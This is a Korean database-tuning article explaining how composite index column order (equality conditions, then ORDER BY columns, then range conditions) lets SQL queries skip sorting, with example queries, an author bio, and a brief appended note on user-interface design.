데이터베이스 시스템을 개발하면서 반드시 필요한 항목 중에 하나가 인덱스다. 인덱스를 이용해야만 우리가 원하는 조회 성능을 보장받을 수 있다. 하지만, 인덱스를 많이 생성하면 오히려 여러 가지 부작용이 발생한다. 이처럼 인덱스는 반드시 필요하지만 잘못 구성하면 돌이킬 수 없는 상황을 유발하기도 한다. 인덱스는 이와 같은 속성 때문에 필요악이라고 말한다. 이러한 인덱스의 부작용을 최대한 방지하려면 최적의 결합 컬럼 인덱스를 생성해야 하며 단일 칼럼 인덱스는 최대한 자제해야 한다.
인덱스를 이용하면서 앞서 우리는 처리 범위를 감소시키기 위해 연산자에 의해 결합 컬럼 인덱스의 컬럼을 선정하는 것과 랜덤 액세스를 제거하는 방법에 대해 확인해 보았다. 이번에는 시스템의 성능을 좌우하는 정렬을 제거하는 결합 컬럼 인덱스의 생성에 대해 알아 보자. 데이터베이스 시스템에서 정렬을 제거할 수 있다면 우리는 많은 혜택을 받을 수 있을 것이다.
정렬의 제거는 인덱스에 의해 좌우된다.
정렬을 제거하려면 어디엔가는 정렬된 데이터가 존재해야 한다. 데이터베이스에서 데이터를 저장하는 장소는 테이블과 인덱스다. 인덱스는 인덱스를 구성하는 컬럼의 값이 실제로 저장된다. 그렇다면 테이블과 인덱스 둘 중 한곳에 정렬된 데이터가 저장된다면 그 것을 이용하여 자동으로 정렬된 값을 추출할 수 있을 것이다. 그렇다면 어느 곳에 정렬된 데이터가 존재하는가? 각각의 특성을 확인해 보자.
● 테이블 - 데이터가 INSERT 되는 순서에 의해 저장되므로 어떤 칼럼에 의해 정렬된 데이터가 저장되지 않는다.
● 인덱스 - 인덱스를 구성하는 컬럼에 의해 정렬된 데이터가 저장된다. 인덱스의 첫 번째 컬럼에 의해 정렬되며 첫 번째 컬럼의 값이 동일한 데이터에 대해서는 인덱스의 두 번째 컬럼에 의해 정렬된다.
테이블에는 정렬된 데이터가 저장될 수 없다. 단지, INSERT 되는 순서에 의해 데이터를 저장하게 된다. 그러므로 어떤 컬럼으로 정렬되어 저장될 가능성은 거의 없다. 하지만, 인덱스는 어떠한가? 이는 사전의 인덱스와 동일하다. 사전에는 모든 단어들이 정렬되어 저장된다. 이와 같이 인덱스는 인덱스를 구성하는 첫 번째 컬럼으로 정렬된 데이터가 저장된다. 인덱스의 첫 번째 컬럼이 동일한 값이라면 인덱스의 두 번째 컬럼으로 정렬된 데이터가 저장될 것이다. 그렇기 때문에 인덱스는 전체적으로 인덱스의 첫 번째 컬럼에 의해 정렬된 데이터가 저장되며 두 번째, 세 번째 칼럼에는 정렬된 데이터가 저장되지 않는다. 이 또한 사전의 인덱스와 동일하다. 사전을 확인해 보면 가장 먼저 A~Z로 정렬되어 있다. 그렇다면 동일한 A로 시작하는 단어는 어떠한가? 해당 단어는 두 번째 단어로 정렬되어 있게 된다. 따라서, AA부터 사전에 등록되고 A로 시작하는 단어의 마지막은 AZ로 시작하는 단어가 된다.
물론, AA로 시작하는 단어 중에는 AAA로 시작하는 단어가 가장 앞에 위치하게 된다. 데이터베이스의 인덱스도 사전의 인덱스와 동일하다.
이와 같은 이유에서 정렬을 제거하기 위해서는 정렬된 데이터가 저장되어 있는 인덱스를 이용해야 할 것이다.
정렬의 제거는 SQL을 가볍게 만든다.
데이터베이스에서 모든 정렬을 제거한다는 것은 어려운 일이다. 물론, 마음먹고 정렬을 제거하고자 한다면 모든 정렬을 제거할 수 있다. 이와 같다면 해당 시스템은 정렬에 대한 부하가 발생하지 않기 때문에 엄청난 성능 향상을 기대할 수 있을 것이다. 반면에 SQL은 인덱스에 의해 제어되고 이를 모르는 사람이 운영을 하게 되면 어느 순간 이와 같은 규칙이 무너질 수 있다. 이와 같은 규칙이 무너지는 순간 해당 시스템은 엄청난 문제가 발생할 것이다. 이처럼 SQL에서 모든 정렬을 제거한다면 관리가 어려워 질 수 있으므로 모든 정렬을 제거하는 것 또한 위험 요소가 된다.
가장 이상적인 방법은 중요한 SQL을 선정하여 해당 SQL에 대해서만 인덱스를 이용해 정렬을 제거하는 것이다. 이와 같이 인덱스를 이용하여 정렬 제거에 대해 전략을 수립하여 적용한다면 시스템의 성능 향상을 기대해도 될 것이다.
그렇다면 어떻게 인덱스를 이용하여 정렬을 제거할 수 있겠는가? 다음의 예제를 확인해 보자.
SQL> SELECT 카드번호, 사용액
FROM 거래내역
WHERE 카드번호 = ‘111’
ORDER BY 거래일자;
이와 같은 예제에서 거래내역 테이블에 카드번호+거래일자 인덱스를 생성하여 해당 인덱스를 이용한다면 자동으로 정렬된 데이터가 추출될 것이다. 그렇다면 해당 SQL에서 ORDER BY 절을 제거해도 된다. 카드번호 컬럼의 값은 동일하므로 카드번호+거래일자 인덱스를 이용한다면 인덱스의 두 번째 컬럼인 거래일자 컬럼의 값으로 자동 정렬되어 결과가 추출되기 때문이다. 인덱스를 이용한 정렬에 대해 한 가지 예제를 추가로 확인해 보자.
SQL> SELECT 카드번호, 사용액
FROM 거래내역
WHERE 카드번호 = ‘111’
AND 거래일자 BETWEEN ‘20080801’ AND ‘20080830’
ORDER BY 승인번호;
이 SQL은 어떻게 인덱스 선정을 해야 정렬된 데이터가 추출될까? 기존대로 인덱스를 WHERE 조건 절과 ORDER BY 절에 사용된 컬럼의 조합으로 생성하면 자동으로 정렬된 데이터가 추출되는가? 그렇다면 인덱스를 카드번호+거래일자+승인번호로 생성한다면 원하는 형태로 승인번호 컬럼의 값으로 정렬된 데이터가 추출되어 ORDER BY 절을 생략할 수 있게 되는가? 이와 같이 인덱스를 선정한다면 정렬된 데이터는 추출되지 않을 것이다. 그 이유는 거래일자 조건의 값이 하나의 값만을 의미하지 않기 때문에 승인번호 컬럼의 값으로 정렬된 데이터가 추출되지 않는다. 그렇다면 어떻게 인덱스를 구성해야 하는가? 자동으로 승인 번호 컬럼의 값으로 정렬된 데이터를 추출하고자 한다면 카드번호+승인번호+거래일자 인덱스 또는 카드번호+승인번호 인덱스를 생성해야 한다.
이와 같이 인덱스를 생성하면 인덱스의 첫 번째 컬럼이 하나의 값만을 의미하게 되므로 인덱스의 두 번째 컬럼인 승인번호 컬럼의 값으로 정렬된 데이터가 추출된다. 카드번호+승인번호+거래일자 인덱스의 거래일자 컬럼은 처리 범위를 감소시키지는 못하며 확인 랜덤 엑세스만을 제거하게 된다. 결국, 정렬을 위한 인덱스는 다음과 같은 형태로 생성해야 한다.
● 점 조건+……+점 조건+ORDER BY 절의 첫 번째 컬럼+……+ORDER BY 절의 n번째 컬럼+선분 조건+……+선분 조건
이런 구조로 인덱스를 생성한다면 ORDER BY 절에 의해 정렬된 데이터가 자동으로 추출되며 모든 선분 조건들은 랜덤 엑세스만을 제거하는 조건이 된다. 위의 규칙에서 점 조건은 Where 조건 절에서 = 조건을 사용한 컬럼을 의미한다. 선분 조건은 = 조건을 제외한 다른 연산자를 사용한 Where 조건 절의 컬럼을 의미한다.
데이터베이스 시스템에서 매우 중요하게 사용되는 SQL에 대해 정렬을 제거할 수 있다면 SQL의 단순화와 성능 향상이라는 매우 큰 혜택을 얻게 될 것이다. 이와 같은 혜택을 누리기 위해서는 프로젝트 초반부터 정렬을 제거하는 인덱스 선정에 많은 노력을 해야 할 것이다.
권순용 kwontra@hanmail.net|DBA로 시작해서 현재는 프리랜서로 SQL 튜닝, 데이터베이스 아키텍처 및 모델링 업무를 주로 하고 있다. 데이터베이스 교육에도 많은 관심을 가지고 있으며 저서로는 정보문화사의 『Perfect! 오라클 실전 튜닝』과 『초보자를 위한 오라클 10g』가 있다. 2008년 4월 데이터 액세스 최적화에 대한 특허를 출원했으며 최근 마이크로소프트웨어에서 『Inside SQL for Beginner』를 출간했다. 현재 데이터베이스 동호회인 cafe.daum.net/oracity 시삽으로 활동 중이다.
사용자를 행복하게 만들려면, 그들이 스스로의 환경을 제어할 수 있다고 느끼도록 만들어야 한다. 이를 위해서는 사용자들의 행동을 정확하게 해석해야 하며, 그들이 기대하는 바대로 움직이는 인터페이스를 만들어야 한다.
즉, 모든 사용자 인터페이스 설계에 적용되는 대원칙은 바로 이것이다.
|
프로그램이사용자의기대와똑같이움직이도록사용자인터페이스를설계하라. |